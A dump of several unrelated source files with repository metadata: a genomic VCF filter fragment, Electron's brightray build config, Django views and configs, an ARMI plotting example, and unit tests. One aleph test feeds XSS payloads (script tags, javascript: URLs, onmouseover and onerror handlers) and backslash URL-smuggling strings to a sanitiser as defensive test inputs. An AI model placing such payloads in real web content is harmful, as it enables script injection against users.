print('### {}: report filename issue to lab'.format(vcf_file.name))
if int(result[1]) > 15:
print('### {}: >15 SNPs with <15X coverage ({}) --> disapproved'.format(vcf_file.name, result[1]))
shutil.move(vcf_file.name, disapproved_folder)
elif int(result[6]) > 8:
print('### {}: >8 heterozygous SNPs with <20% MAF ({}) --> disapproved'.format(vcf_file.name, result[6]))
shutil.move(vcf_file.name, disapproved_folder)
elif int(result[2]) < 8:
print('### {}: <8 homozygous ALT SNPs called ({}) --> disapproved'.format(vcf_file.name, result[2]))
shutil.move(vcf_file.name, disapproved_folder)
elif result[4] == 'F' and int(result[5]) > 100 or result[4] == 'M' and int(result[5]) < 100:
print('### {}: gender {} with {} reads on chromosome Y, discuss with lab and disapprove if needed'.format(vcf_file.name, result[4], result[5]))
shutil.move(vcf_file.name, approved_folder)
else:
shutil.move(vcf_file.name, approved_folder)
for line in logbook:
print '\t'.join(line)
| 45.045977 | 155 | 0.546313 |
312255cffc122fbff5083163ad6414b714bca7f3 | 20,066 | gyp | Python | brightray/brightray.gyp | frantic/electron | 4ebe71655b1575f985ddde5760f8f5cde8f03f0d | [
"MIT"
] | 2 | 2018-06-23T22:04:12.000Z | 2018-06-28T08:59:52.000Z | brightray/brightray.gyp | frantic/electron | 4ebe71655b1575f985ddde5760f8f5cde8f03f0d | [
"MIT"
] | null | null | null | brightray/brightray.gyp | frantic/electron | 4ebe71655b1575f985ddde5760f8f5cde8f03f0d | [
"MIT"
] | 1 | 2018-10-05T17:29:23.000Z | 2018-10-05T17:29:23.000Z | {
'variables': {
# The libraries brightray will be compiled to.
'linux_system_libraries': 'gtk+-3.0 atk-bridge-2.0 dbus-1 x11 x11-xcb xcb xi xcursor xdamage xrandr xcomposite xext xfixes xrender xtst xscrnsaver gconf-2.0 gmodule-2.0 nss',
'conditions': [
['target_arch=="mips64el"', {
'linux_system_libraries': '<(linux_system_libraries) libpulse',
}],
],
},
'includes': [
'filenames.gypi',
],
'targets': [
{
'target_name': 'brightray',
'type': 'static_library',
'include_dirs': [
'..',
'<(libchromiumcontent_src_dir)',
'<(libchromiumcontent_src_dir)/skia/config',
'<(libchromiumcontent_src_dir)/third_party/boringssl/src/include',
'<(libchromiumcontent_src_dir)/third_party/skia/include/core',
'<(libchromiumcontent_src_dir)/third_party/skia/include/gpu',
'<(libchromiumcontent_src_dir)/third_party/mojo/src',
'<(libchromiumcontent_src_dir)/third_party/WebKit',
'<(libchromiumcontent_src_dir)/third_party/khronos',
'<(libchromiumcontent_src_dir)/third_party/protobuf/src',
'<(libchromiumcontent_dir)/gen',
],
'direct_dependent_settings': {
'include_dirs': [
'../vendor',
'<(libchromiumcontent_src_dir)',
'<(libchromiumcontent_src_dir)/gpu',
'<(libchromiumcontent_src_dir)/skia/config',
'<(libchromiumcontent_src_dir)/third_party/boringssl/src/include',
'<(libchromiumcontent_src_dir)/third_party/skia/include/core',
'<(libchromiumcontent_src_dir)/third_party/skia/include/gpu',
'<(libchromiumcontent_src_dir)/third_party/skia/include/config',
'<(libchromiumcontent_src_dir)/third_party/icu/source/common',
'<(libchromiumcontent_src_dir)/third_party/mojo/src',
'<(libchromiumcontent_src_dir)/third_party/khronos',
'<(libchromiumcontent_src_dir)/third_party/WebKit',
'<(libchromiumcontent_dir)/gen',
'<(libchromiumcontent_dir)/gen/third_party/WebKit',
],
},
'defines': [
# See Chromium's "src/third_party/protobuf/BUILD.gn".
'GOOGLE_PROTOBUF_NO_RTTI',
'GOOGLE_PROTOBUF_NO_STATIC_INITIALIZER',
],
'sources': [ '<@(brightray_sources)' ],
'conditions': [
# Link with libraries of libchromiumcontent.
['OS=="linux" and libchromiumcontent_component==0', {
# On Linux we have to use "--whole-archive" to force executable
# to include all symbols, otherwise we will have plenty of
# unresolved symbols errors.
'direct_dependent_settings': {
'ldflags': [
'-Wl,--whole-archive',
'<@(libchromiumcontent_libraries)',
'-Wl,--no-whole-archive',
],
}
}, { # (Release build on Linux)
'link_settings': {
'libraries': [ '<@(libchromiumcontent_libraries)' ]
},
}], # (Normal builds)
# Linux specific link settings.
['OS=="linux"', {
'link_settings': {
'ldflags': [
'<!@(<(pkg-config) --libs-only-L --libs-only-other <(linux_system_libraries))',
],
'libraries': [
'-lpthread',
'-latomic',
'<!@(<(pkg-config) --libs-only-l <(linux_system_libraries))',
],
},
'cflags': [
'<!@(<(pkg-config) --cflags <(linux_system_libraries))',
],
'direct_dependent_settings': {
'cflags': [
'<!@(<(pkg-config) --cflags <(linux_system_libraries))',
],
},
'conditions': [
['clang==1', {
'cflags_cc': [
'-Wno-reserved-user-defined-literal',
],
'cflags': [
# Needed by using libgtkui:
'-Wno-deprecated-register',
'-Wno-sentinel',
],
'direct_dependent_settings': {
'cflags': [
'-Wno-deprecated-register',
'-Wno-sentinel',
],
},
}],
['libchromiumcontent_component', {
'link_settings': {
'libraries': [
# Following libraries are always linked statically.
'<(libchromiumcontent_dir)/libgtkui.a',
'<(libchromiumcontent_dir)/libhttp_server.a',
'<(libchromiumcontent_dir)/libdevice_service.a',
'<(libchromiumcontent_dir)/libdom_keycode_converter.a',
'<(libchromiumcontent_dir)/libsystem_wrappers.a',
'<(libchromiumcontent_dir)/librtc_base.a',
'<(libchromiumcontent_dir)/librtc_base_generic.a',
'<(libchromiumcontent_dir)/libwebrtc_common.a',
'<(libchromiumcontent_dir)/libinit_webrtc.a',
'<(libchromiumcontent_dir)/libyuv.a',
'<(libchromiumcontent_dir)/librenderer.a',
'<(libchromiumcontent_dir)/libsecurity_state.a',
'<(libchromiumcontent_dir)/libviz_service.a',
# services/device/wake_lock/power_save_blocker/
'<(libchromiumcontent_dir)/libpower_save_blocker.a',
# Friends of libpdf.a:
# On Linux we have to use "--whole-archive" to include
# all symbols, otherwise there will be plenty of
# unresolved symbols errors.
'-Wl,--whole-archive',
'<(libchromiumcontent_dir)/libpdf.a',
'<(libchromiumcontent_dir)/libppapi_cpp_objects.a',
'<(libchromiumcontent_dir)/libppapi_internal_module.a',
'<(libchromiumcontent_dir)/libpdfium.a',
'<(libchromiumcontent_dir)/libpdfium_skia_shared.a',
'<(libchromiumcontent_dir)/libfdrm.a',
'<(libchromiumcontent_dir)/libformfiller.a',
'<(libchromiumcontent_dir)/libfpdfapi.a',
'<(libchromiumcontent_dir)/libfpdfdoc.a',
'<(libchromiumcontent_dir)/libfpdftext.a',
'<(libchromiumcontent_dir)/libfxcodec.a',
'<(libchromiumcontent_dir)/libfxge.a',
'<(libchromiumcontent_dir)/libfxjs.a',
'<(libchromiumcontent_dir)/libpwl.a',
'<(libchromiumcontent_dir)/libfx_agg.a',
'<(libchromiumcontent_dir)/libfx_lcms2.a',
'<(libchromiumcontent_dir)/libfx_libopenjpeg.a',
'<(libchromiumcontent_dir)/libfx_zlib.a',
'-Wl,--no-whole-archive',
],
},
}, {
'link_settings': {
'libraries': [
# Link with ffmpeg.
'<(libchromiumcontent_dir)/libffmpeg.so',
# Following libraries are required by libchromiumcontent:
'-lasound',
'-lcap',
'-lcups',
'-lrt',
'-ldl',
'-lresolv',
'-lfontconfig',
'-lexpat',
],
},
}],
# This lib does not exist on arm.
['target_arch=="arm"', {
'link_settings': {
'libraries!': [
'<(libchromiumcontent_dir)/libdesktop_capture_differ_sse2.a',
],
},
}],
# Due to strange linker behavior, component build of arm needs to
# be linked with libjpeg.a explicitly.
['target_arch=="arm" and libchromiumcontent_component==1', {
'link_settings': {
'libraries': [
'<(libchromiumcontent_dir)/libjpeg.a',
],
},
}],
],
}], # OS=="linux"
['OS=="mac"', {
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/AppKit.framework',
# Required by webrtc:
'$(SDKROOT)/System/Library/Frameworks/OpenGL.framework',
'$(SDKROOT)/System/Library/Frameworks/IOKit.framework',
# Required by media:
'$(SDKROOT)/System/Library/Frameworks/VideoToolbox.framework',
],
},
'conditions': [
['libchromiumcontent_component', {
'link_settings': {
'libraries': [
# Following libraries are always linked statically.
'<(libchromiumcontent_dir)/libhttp_server.a',
'<(libchromiumcontent_dir)/libdevice_service.a',
'<(libchromiumcontent_dir)/libdom_keycode_converter.a',
'<(libchromiumcontent_dir)/librtc_base.a',
'<(libchromiumcontent_dir)/librtc_base_generic.a',
'<(libchromiumcontent_dir)/libsystem_wrappers.a',
'<(libchromiumcontent_dir)/libwebrtc_common.a',
'<(libchromiumcontent_dir)/libinit_webrtc.a',
'<(libchromiumcontent_dir)/libyuv.a',
'<(libchromiumcontent_dir)/libpdfium_skia_shared.a',
'<(libchromiumcontent_dir)/librenderer.a',
'<(libchromiumcontent_dir)/libsecurity_state.a',
'<(libchromiumcontent_dir)/libviz_service.a',
# services/device/wake_lock/power_save_blocker/
'<(libchromiumcontent_dir)/libpower_save_blocker.a',
# Friends of libpdf.a:
'<(libchromiumcontent_dir)/libpdf.a',
'<(libchromiumcontent_dir)/libppapi_cpp_objects.a',
'<(libchromiumcontent_dir)/libppapi_internal_module.a',
'<(libchromiumcontent_dir)/libjpeg.a',
'<(libchromiumcontent_dir)/libpdfium.a',
'<(libchromiumcontent_dir)/libfdrm.a',
'<(libchromiumcontent_dir)/libformfiller.a',
'<(libchromiumcontent_dir)/libfpdfapi.a',
'<(libchromiumcontent_dir)/libfpdfdoc.a',
'<(libchromiumcontent_dir)/libfpdftext.a',
'<(libchromiumcontent_dir)/libfxcodec.a',
'<(libchromiumcontent_dir)/libfxcrt.a',
'<(libchromiumcontent_dir)/libfxge.a',
'<(libchromiumcontent_dir)/libfxjs.a',
'<(libchromiumcontent_dir)/libpwl.a',
'<(libchromiumcontent_dir)/libfx_agg.a',
'<(libchromiumcontent_dir)/libfx_lcms2.a',
'<(libchromiumcontent_dir)/libfx_libopenjpeg.a',
'<(libchromiumcontent_dir)/libfx_zlib.a',
],
},
}, {
'link_settings': {
'libraries': [
# Link with ffmpeg.
'<(libchromiumcontent_dir)/libffmpeg.dylib',
# Link with system frameworks.
# ui_base.gypi:
'$(SDKROOT)/System/Library/Frameworks/Accelerate.framework',
# net.gypi:
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
'$(SDKROOT)/System/Library/Frameworks/Security.framework',
'$(SDKROOT)/System/Library/Frameworks/SystemConfiguration.framework',
'-lresolv',
# media.gyp:
'$(SDKROOT)/System/Library/Frameworks/AudioToolbox.framework',
'$(SDKROOT)/System/Library/Frameworks/AudioUnit.framework',
'$(SDKROOT)/System/Library/Frameworks/AVFoundation.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreAudio.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreMedia.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreMIDI.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreVideo.framework',
# surface.gyp:
'$(SDKROOT)/System/Library/Frameworks/IOSurface.framework',
# content_common.gypi:
'$(SDKROOT)/System/Library/Frameworks/QuartzCore.framework',
# base.gyp:
'$(SDKROOT)/System/Library/Frameworks/ApplicationServices.framework',
'$(SDKROOT)/System/Library/Frameworks/Carbon.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreFoundation.framework',
# device/gamepad/BUILD.gn:
'$(SDKROOT)/System/Library/Frameworks/ForceFeedback.framework',
'$(SDKROOT)/System/Library/Frameworks/GameController.framework',
# content_browser.gypi:
'-lbsm',
# content_common.gypi:
'-lsandbox',
# bluetooth.gyp:
'$(SDKROOT)/System/Library/Frameworks/IOBluetooth.framework',
# components/wifi/BUILD.gn:
'$(SDKROOT)/System/Library/Frameworks/CoreWLAN.framework',
# printing/BUILD.gn:
'-lcups',
],
},
}],
]
}], # OS=="mac"
['OS=="win"', {
'link_settings': {
'msvs_settings': {
'VCLinkerTool': {
'AdditionalOptions': [
# warning /DELAYLOAD:dll ignored; no imports found from dll
'/ignore:4199',
],
'AdditionalDependencies': [
'delayimp.lib',
],
'DelayLoadDLLs': [
'wtsapi32.dll',
# content_common.gypi:
'd3d9.dll',
'd3d11.dll',
'dxva2.dll',
# media.gyp:
'mf.dll',
'mfplat.dll',
'mfreadwrite.dll',
# bluetooth.gyp:
'BluetoothApis.dll',
'Bthprops.cpl',
'setupapi.dll',
# base.gyp:
'cfgmgr32.dll',
'powrprof.dll',
'setupapi.dll',
# net_common.gypi:
'crypt32.dll',
'dhcpcsvc.dll',
'rpcrt4.dll',
'secur32.dll',
'urlmon.dll',
'winhttp.dll',
# windows runtime
'API-MS-WIN-CORE-WINRT-L1-1-0.DLL',
'API-MS-WIN-CORE-WINRT-STRING-L1-1-0.DLL',
],
},
},
},
'conditions': [
['libchromiumcontent_component', {
'link_settings': {
'libraries': [
# Needed by desktop_capture.lib:
'-ld3d11.lib',
'-ldxgi.lib',
# Following libs are always linked statically.
'<(libchromiumcontent_dir)/base_static.lib',
'<(libchromiumcontent_dir)/sandbox.lib',
'<(libchromiumcontent_dir)/sandbox_helper_win.lib',
'<(libchromiumcontent_dir)/http_server.lib',
'<(libchromiumcontent_dir)/device_service.lib',
'<(libchromiumcontent_dir)/dom_keycode_converter.lib',
'<(libchromiumcontent_dir)/rtc_base.lib',
'<(libchromiumcontent_dir)/rtc_base_generic.lib',
'<(libchromiumcontent_dir)/system_wrappers.lib',
'<(libchromiumcontent_dir)/webrtc_common.lib',
'<(libchromiumcontent_dir)/init_webrtc.lib',
'<(libchromiumcontent_dir)/libyuv.lib',
'<(libchromiumcontent_dir)/pdfium_skia_shared.lib',
'<(libchromiumcontent_dir)/renderer.lib',
'<(libchromiumcontent_dir)/security_state.lib',
'<(libchromiumcontent_dir)/viz_service.lib',
# services/device/wake_lock/power_save_blocker/
'<(libchromiumcontent_dir)/power_save_blocker.lib',
# Friends of pdf.lib:
'<(libchromiumcontent_dir)/pdf.lib',
'<(libchromiumcontent_dir)/ppapi_cpp_objects.lib',
'<(libchromiumcontent_dir)/ppapi_internal_module.lib',
'<(libchromiumcontent_dir)/libjpeg.lib',
'<(libchromiumcontent_dir)/pdfium.lib',
'<(libchromiumcontent_dir)/fdrm.lib',
'<(libchromiumcontent_dir)/formfiller.lib',
'<(libchromiumcontent_dir)/fpdfapi.lib',
'<(libchromiumcontent_dir)/fpdfdoc.lib',
'<(libchromiumcontent_dir)/fpdftext.lib',
'<(libchromiumcontent_dir)/fpdftext.lib',
'<(libchromiumcontent_dir)/fxcodec.lib',
'<(libchromiumcontent_dir)/fxcrt.lib',
'<(libchromiumcontent_dir)/fxge.lib',
'<(libchromiumcontent_dir)/fxjs.lib',
'<(libchromiumcontent_dir)/pwl.lib',
'<(libchromiumcontent_dir)/fx_agg.lib',
'<(libchromiumcontent_dir)/fx_lcms2.lib',
'<(libchromiumcontent_dir)/fx_libopenjpeg.lib',
'<(libchromiumcontent_dir)/fx_zlib.lib',
'<(libchromiumcontent_dir)/desktop_capture_generic.lib',
'<(libchromiumcontent_dir)/desktop_capture.lib',
],
},
}, {
# Link with system libraries.
'link_settings': {
'libraries': [
# Link with ffmpeg.
'<(libchromiumcontent_dir)/ffmpeg.dll',
# content_browser.gypi:
'-lsensorsapi.lib',
'-lportabledeviceguids.lib',
# content_common.gypi:
'-ld3d9.lib',
'-ld3d11.lib',
'-ldxgi.lib',
'-ldxva2.lib',
'-lstrmiids.lib',
'-lmf.lib',
'-lmfplat.lib',
'-lmfuuid.lib',
# media.gyp:
'-ldxguid.lib',
'-lmfreadwrite.lib',
'-lmfuuid.lib',
],
'msvs_settings': {
'VCLinkerTool': {
'AdditionalDependencies': [
'advapi32.lib',
'dbghelp.lib',
'dwmapi.lib',
'gdi32.lib',
'hid.lib',
'netapi32.lib',
'oleacc.lib',
'user32.lib',
'usp10.lib',
'version.lib',
'winspool.lib',
'wtsapi32.lib',
# bluetooth.gyp:
'Bthprops.lib',
'BluetoothApis.lib',
# base.gyp:
'cfgmgr32.lib',
'powrprof.lib',
'setupapi.lib',
# net_common.gypi:
'crypt32.lib',
'dhcpcsvc.lib',
'ncrypt.lib',
'rpcrt4.lib',
'secur32.lib',
'urlmon.lib',
'winhttp.lib',
# ui/gfx/BUILD.gn:
'dwrite.lib',
# skia/BUILD.gn:
'fontsub.lib',
],
},
},
},
}], # libchromiumcontent_component
],
}], # OS=="win"
],
},
],
}
| 44.295806 | 178 | 0.490531 |
1c95c05af99855151e97f19bd06dad4d38303553 | 409 | py | Python | rate_my_landlord/rate_my_landlord/asgi.py | Antsthebul/ratemylandlord | 729bd3307ebb3288df2d8173b10d41f57265bdae | [
"Apache-2.0"
] | 1 | 2021-10-10T00:21:15.000Z | 2021-10-10T00:21:15.000Z | rate_my_landlord/rate_my_landlord/asgi.py | Antsthebul/ratemylandlord | 729bd3307ebb3288df2d8173b10d41f57265bdae | [
"Apache-2.0"
] | 19 | 2021-10-04T05:01:05.000Z | 2021-12-06T23:39:00.000Z | rate_my_landlord/rate_my_landlord/asgi.py | Antsthebul/ratemylandlord | 729bd3307ebb3288df2d8173b10d41f57265bdae | [
"Apache-2.0"
] | 4 | 2021-11-28T15:34:36.000Z | 2021-12-03T23:56:59.000Z | """
ASGI config for rate_my_landlord project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'rate_my_landlord.settings')
application = get_asgi_application()
| 24.058824 | 78 | 0.794621 |
15950e6e93266782283cd21dcc0e6af671a1bde2 | 5,472 | py | Python | products/views.py | sakthipriya-07/BuildingConstructionMaterialsSupply | e4b32d97eb6e574e78b955a03a0717bc7b5d13d4 | [
"MIT"
] | null | null | null | products/views.py | sakthipriya-07/BuildingConstructionMaterialsSupply | e4b32d97eb6e574e78b955a03a0717bc7b5d13d4 | [
"MIT"
] | null | null | null | products/views.py | sakthipriya-07/BuildingConstructionMaterialsSupply | e4b32d97eb6e574e78b955a03a0717bc7b5d13d4 | [
"MIT"
] | null | null | null | from django.contrib.admin.views.decorators import staff_member_required
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from .filter import ProductFilter
from .models import Category, Product
from users.models import Customer, User
from orders.models import Order
from cart.forms import CartAddProductForm
from .forms import ProductForm, CategoryForm, RFQForm
def home(request):
    """Route the visitor to the landing page matching their role:
    staff -> employee dashboard, logged-in customer -> product list,
    anonymous -> public home."""
    if request.user.is_staff:
        return redirect('products:employee_home')
    if request.user.username:
        return redirect('products:product_list')
    return redirect('users:home')
def product_list(request, category_slug=None):
    """List available products, optionally narrowed to one category.

    category_slug: optional slug from the URL; a non-matching slug 404s.
    GET parameters are additionally applied through ProductFilter
    (fields as declared in .filter.ProductFilter).
    """
    category = None
    categories = Category.objects.all()
    # Only products flagged as available are ever shown.
    products = Product.objects.filter(available=True)
    if category_slug:
        category = get_object_or_404(Category, slug=category_slug)
        products = products.filter(category=category)
    # Layer the user-supplied GET filters on top of the base queryset.
    productFilter = ProductFilter(request.GET, queryset=products)
    products = productFilter.qs
    return render(request,
                  'buildingsupply/list.html',
                  {'category': category,
                   'categories': categories,
                   'products': products,
                   'productFilter': productFilter})
def product_detail(request, id, slug):
    """Render the detail page for one available product, with an
    add-to-cart form."""
    product = get_object_or_404(Product,
                                id=id,
                                slug=slug,
                                available=True)
    context = {
        'product': product,
        'cart_product_form': CartAddProductForm(),
        'user': request.user,
    }
    return render(request, 'buildingsupply/detail.html', context)
@staff_member_required
def product_new(request):
    """Staff-only: create a new product from a submitted form."""
    if request.method != "POST":
        return render(request, 'buildingsupply/product_new.html',
                      {'form': ProductForm()})
    form = ProductForm(request.POST, request.FILES)
    if form.is_valid():
        product = form.save(commit=False)
        product.save()
        return redirect('products:product_list')
    # Invalid submission: re-render with the bound form so errors show.
    return render(request, 'buildingsupply/product_new.html', {'form': form})
@staff_member_required
def product_edit(request, pk):
    """Staff-only: edit an existing product.

    Fix: pass request.FILES to the form -- product_new already does, and
    without it any uploaded image change was silently dropped on edit.
    """
    product = get_object_or_404(Product, pk=pk)
    if request.method == "POST":
        form = ProductForm(request.POST, request.FILES, instance=product)
        if form.is_valid():
            product = form.save()
            # Stamp the modification time after a successful save.
            product.updated = timezone.now()
            product.save()
            return redirect('products:product_list')
    else:
        form = ProductForm(instance=product)
    return render(request, 'buildingsupply/product_edit.html', {'form': form})
@staff_member_required
def category_list_emp(request):
    """Staff-only: list every product category for the admin pages."""
    context = {'categories': Category.objects.all()}
    return render(request, 'buildingsupply/categories_list.html', context)
@staff_member_required
def category_new(request):
    """Staff-only: create a new category from a submitted form."""
    if request.method != "POST":
        return render(request, 'buildingsupply/category_new.html',
                      {'form': CategoryForm()})
    form = CategoryForm(request.POST)
    if form.is_valid():
        new_category = form.save(commit=False)
        new_category.save()
        return redirect('products:category_list')
    # Invalid submission: re-render with the bound form so errors show.
    return render(request, 'buildingsupply/category_new.html', {'form': form})
@staff_member_required
def category_edit(request, pk):
    """Staff-only: edit an existing category; 404s on an unknown pk."""
    category = get_object_or_404(Category, pk=pk)
    if request.method != "POST":
        form = CategoryForm(instance=category)
    else:
        form = CategoryForm(request.POST, instance=category)
        if form.is_valid():
            category = form.save()
            category.save()
            return redirect('products:category_list')
    # GET, or invalid POST: show the (possibly bound) form again.
    return render(request, 'buildingsupply/category_edit.html',
                  {'form': form, 'pk': pk})
@staff_member_required
def employee_home(request):
    """Staff-only dashboard: headline record counts for the admin home.

    Counts are passed as strings, matching what the template expects.
    """
    counts = {
        "categoryCount": str(Category.objects.all().count()),
        "productsCount": str(Product.objects.all().count()),
        "customerCount": str(Customer.objects.all().count()),
        "orderCount": str(Order.objects.all().count()),
    }
    return render(request, 'buildingsupply/employee_home.html',
                  {'context': counts})
def category_list(request):
    # NOTE(review): unlike the views in this module, this returns a plain
    # dict rather than an HttpResponse -- it looks like a template context
    # processor (categories for every page). Confirm it is registered as
    # one, and that `request` being unused is intentional.
    categories = Category.objects.all()
    context = {
        "categories": categories,
    }
    return context
@staff_member_required
def category_delete(request, pk):
    """Staff-only: confirm (GET) and perform (POST) category deletion."""
    category = get_object_or_404(Category, pk=pk)
    if request.method != "POST":
        # Confirmation page before anything is removed.
        return render(request, 'buildingsupply/category_delete.html',
                      {'category': category})
    category.delete()
    return redirect('products:category_list_emp')
@staff_member_required
def product_delete(request, pk):
    """Staff-only: confirm (GET) and perform (POST) product deletion."""
    product = get_object_or_404(Product, pk=pk)
    if request.method != "POST":
        # Confirmation page before anything is removed.
        return render(request, 'buildingsupply/product_delete.html',
                      {'product': product})
    product.delete()
    return redirect('products:product_list')
def RFQ(request):
    """Request-for-quote form: show the form on GET, save it on POST.

    Fixes: the original bound request.POST/request.FILES unconditionally
    (even on GET, where the empty bound form only worked by accident) and
    discarded the bound form on an invalid POST, so users never saw their
    validation errors. Now GET gets a fresh unbound form and an invalid
    POST re-renders the bound form with its errors.
    """
    if request.method == "POST":
        form = RFQForm(request.POST, request.FILES)
        if form.is_valid():
            form.save()
            return render(request, 'buildingsupply/request_done.html')
    else:
        form = RFQForm()
    return render(request, 'buildingsupply/RFQ.html', {'form': form})
| 31.813953 | 89 | 0.64693 |
2fe4b6ce52dc3889955b82d99b7a0a407ef5fd32 | 765 | py | Python | doc/gallery-src/framework/run_isotxs2_matrix.py | ZanderUF/armi | c55ebe4d77821d3357ddd3326478ffaf44962c89 | [
"Apache-2.0"
] | 1 | 2022-01-23T06:09:50.000Z | 2022-01-23T06:09:50.000Z | doc/gallery-src/framework/run_isotxs2_matrix.py | ZanderUF/armi | c55ebe4d77821d3357ddd3326478ffaf44962c89 | [
"Apache-2.0"
] | null | null | null | doc/gallery-src/framework/run_isotxs2_matrix.py | ZanderUF/armi | c55ebe4d77821d3357ddd3326478ffaf44962c89 | [
"Apache-2.0"
] | 1 | 2020-08-26T09:02:06.000Z | 2020-08-26T09:02:06.000Z | """
Plotting a multi-group scatter matrix
=====================================
Here we plot scatter matrices from an ISOTXS microscopic cross section library.
We plot the inelastic scatter cross section of U235 as well as the (n,2n) source
matrix.
See Also: :py:mod:`ISOTXS <armi.nuclearDataIO.isotxs>` format.
"""
import matplotlib.pyplot as plt
from armi.utils import units
from armi.tests import ISOAA_PATH
from armi.nuclearDataIO import isotxs
from armi.nuclearDataIO import xsNuclides
import armi
# Initialize the ARMI framework before using its I/O layers.
armi.configure()
# Load the bundled test ISOTXS library and pull the U-235 nuclide
# from cross-section set "AA".
lib = isotxs.readBinary(ISOAA_PATH)
u235 = lib.getNuclide("U235", "AA")
# Plot the inelastic scatter matrix, then the (n,2n) source matrix
# on a separate figure.
xsNuclides.plotScatterMatrix(u235.micros.inelasticScatter, "U-235 inelastic")
plt.figure()
xsNuclides.plotScatterMatrix(u235.micros.n2nScatter, "U-235 n,2n src")
| 24.677419 | 80 | 0.747712 |
508585309fe1e22ce027e5d9067f2eb7247ed665 | 2,036 | py | Python | aleph/tests/test_view_util.py | Rosencrantz/aleph | 47ac45fa72607e1ab16c7c30690013a7d00be116 | [
"MIT"
] | 1,213 | 2017-03-15T08:10:52.000Z | 2022-03-29T13:57:44.000Z | aleph/tests/test_view_util.py | Rosencrantz/aleph | 47ac45fa72607e1ab16c7c30690013a7d00be116 | [
"MIT"
] | 1,374 | 2017-03-14T18:23:10.000Z | 2022-03-31T18:42:20.000Z | aleph/tests/test_view_util.py | Rosencrantz/aleph | 47ac45fa72607e1ab16c7c30690013a7d00be116 | [
"MIT"
] | 217 | 2017-03-17T12:04:22.000Z | 2022-03-20T11:17:16.000Z | from lxml.html import document_fromstring
from aleph.logic.html import sanitize_html
from aleph.views.util import get_url_path
from aleph.tests.util import TestCase
class ViewUtilTest(TestCase):
    """Tests for aleph.views.util helpers (URL-path extraction) and the
    HTML sanitizer."""

    def setUp(self):
        super(ViewUtilTest, self).setUp()

    # NOTE(review): method name has a typo ("pat" -> "path"); still
    # discovered by the test runner, but consider renaming.
    def test_get_url_pat(self):
        # Path extraction must strip scheme/host and survive backslash
        # tricks that smuggle a foreign host before the real one.
        self.assertEqual("/", get_url_path(""))
        self.assertEqual("/next", get_url_path("/next"))
        self.assertEqual("/next", get_url_path("https://aleph.ui:3000/next"))
        url = get_url_path("https://example.com\\@aleph.ui/oauth?path=%%2F")
        self.assertEqual("/oauth?path=%%2F", url)
        self.assertEqual("/%%2F", get_url_path("https://example.com\\@aleph.ui/%%2F"))

    def test_sanitize_html(self):
        # XSS-laden document: script/style/link tags, javascript: URLs,
        # inline event handlers, and a relative link to be absolutized.
        html_str = '<!doctype html><html><head><title>Article</title><style type="text/css">body { }</style><script>alert("We love Angular")</script><link rel="stylesheet" href="http://xss.rocks/xss.css"></head><body><article id="story"><h1>We welcome our new React overlords</h1><img src=" javascript:alert(\'XSS\');" alt="" /><p>Published on <time onmouseover="alert(\'XSS\')">1 January 2018</time></p><p>Really the only thing better than the <a href="/blockchain">blockchain</a> is ReactJS.</p></article><video> <source onerror = "javascript: alert (XSS)"></video></body></html>'  # noqa
        processed = sanitize_html(html_str, "https://example.org/welcome-react")
        html = document_fromstring(processed)
        # Dangerous elements must be removed outright...
        assert html.find(".//img") is None, html
        assert html.find(".//video") is None, html
        assert html.find(".//style") is None, html
        assert html.find(".//script") is None, html
        # ...while the article content survives.
        assert len(html.findall(".//article")) == 1, html
        # Event-handler attributes are stripped.
        attr = html.find(".//time").get("onmouseover")
        assert attr is None, html
        # Relative links are resolved against the page URL and hardened.
        attr = html.find(".//a").get("href")
        assert attr == "https://example.org/blockchain", html
        assert html.find(".//a").get("target") == "_blank", html
        assert "nofollow" in html.find(".//a").get("rel"), html
0f49c2ca12b45c7d573c187e9cd7c1eb781d9664 | 1,794 | py | Python | tests/json_tests.py | Caflo/sniffy | 35da1aa5c6de6ce1cb64d66125ff8dabdd03a928 | [
"MIT"
] | null | null | null | tests/json_tests.py | Caflo/sniffy | 35da1aa5c6de6ce1cb64d66125ff8dabdd03a928 | [
"MIT"
] | null | null | null | tests/json_tests.py | Caflo/sniffy | 35da1aa5c6de6ce1cb64d66125ff8dabdd03a928 | [
"MIT"
] | null | null | null | import os
import logging
import unittest
import subprocess
from src.log.log import logger
from unittest import TestCase
from src.controller.sniffer_ctrl import RequestHandler
class TestJson(TestCase):
    """Integration-style tests for RequestHandler's JSON-backed sniffer config.

    Each test loads its own fixture (tests/resources/sniffers_0N.json); setUp
    restores the fixture files before every test so runs stay isolated.
    """
    def setUp(self) -> None:
        print("\n\n----------------- SETUP -----------------")
        print("Getting shared logger")
        self.logger = logging.getLogger("sniffy.json_tests")
        logger.info("Cleaning up...")
        subprocess.call(['tests\\restore_resources.bat']) # TODO do a better cross-platform way to restore files
    def test_01_read_sniffers(self):
        """Listing all sniffers and only the active ones from a fixture."""
        print("\n\n----------------- TEST 01: GET ALL SNIFFERS / GET ACTIVE SNIFFERS -----------------")
        self.cf = RequestHandler(config_path='tests/resources', config_filename='sniffers_01.json')
        self.cf.get_all_sniffers()
        self.cf.get_active_sniffers()
    def test_02_add_sniffer(self):
        """Adding a sniffer for a new interface."""
        print("\n\n----------------- TEST 02: ADD SNIFFER -----------------")
        self.cf = RequestHandler(config_path='tests/resources', config_filename='sniffers_02.json')
        self.cf.add_sniffer("iface-test-4")
        self.cf.get_all_sniffers()
    def test_03_remove_sniffer(self):
        """Removing the sniffer with id 2."""
        print("\n\n----------------- TEST 03: REMOVE SNIFFER -----------------")
        self.cf = RequestHandler(config_path='tests/resources', config_filename='sniffers_03.json')
        self.cf.get_all_sniffers()
        self.cf.remove_sniffer(2)
    def test_04_clear_all_sniffers(self):
        """Clearing every configured sniffer."""
        # Bug fix: the banner previously said "TEST 03" (copy-paste error).
        print("\n\n----------------- TEST 04: CLEAR ALL SNIFFERS -----------------")
        self.cf = RequestHandler(config_path='tests/resources', config_filename='sniffers_04.json')
        self.cf.clear_all_sniffers()
        self.cf.get_all_sniffers()
